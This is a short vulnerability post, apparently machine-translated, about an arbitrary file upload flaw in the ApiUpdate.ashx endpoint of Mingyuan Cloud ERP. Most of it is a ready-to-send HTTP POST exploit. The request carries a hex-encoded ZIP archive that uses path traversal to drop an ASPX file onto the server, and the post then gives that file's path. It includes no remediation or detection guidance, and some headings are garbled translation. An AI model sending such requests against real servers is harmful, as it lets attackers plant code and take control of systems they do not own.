Mingyuan Cloud Erp System Interface Manager Apiupdate Ashx Any File Upload Vulnerability
Mingyuan Cloud Erp System Interface Manager Apiupdate Ashx Any File Upload Vulnerability
Mingyuan Cloud ERP system Interface Manager ApiUpdate.ashx Any file upload vulnerability
Vulnerability Description
Mingyuan Cloud ERP system interface manager ApiUpdate.ashx file has a vulnerability to upload any file. The attacker can upload any file by constructing a special ZIP compression package to control the server.
Vulnerability Impact
Mingyuan Cloud ERP system interface manager
Network surveying and mapping
Vulnerability reappears
Login page
The vulnerability exists in the interface manager service under a certain port
Verify POC
1
2
3
4
5
6
7
POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1
Host:
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 856
%7B%7Bhexdec%28504B030414000000080063740E576AE37B2383000000940000001D0000002E2E2F2E2E2F2E2E2F666463636C6F75642F5F2F746573742E6173707825CC490AC2401404D0BDA7685A02C9A62F90288A22041C42E2B0FE4A11033DD983E0EDFDE2AEA8575453AC444723C49EEC98392CE4662E45B16C185AE35D48E24806D1D3836DF8C404A3DAD37F227A066723D42D4C09A53C23A66BD65656F56ED2505B68703F20BC11D4817C47E959F678651EAA4BD06A7D8F4EE7841F5455CDB7B32F504B0102140314000000080063740E576AE37B2383000000940000001D00000000000000000000008001000000002E2E2F2E2E2F2E2E2F666463636C6F75642F5F2F746573742E61737078504B050600000000010001004B000000BE0000000000%29%7D%7D
1
/fdccloud/_/test.aspx
This post is licensed under CC BY 4.0 by the author.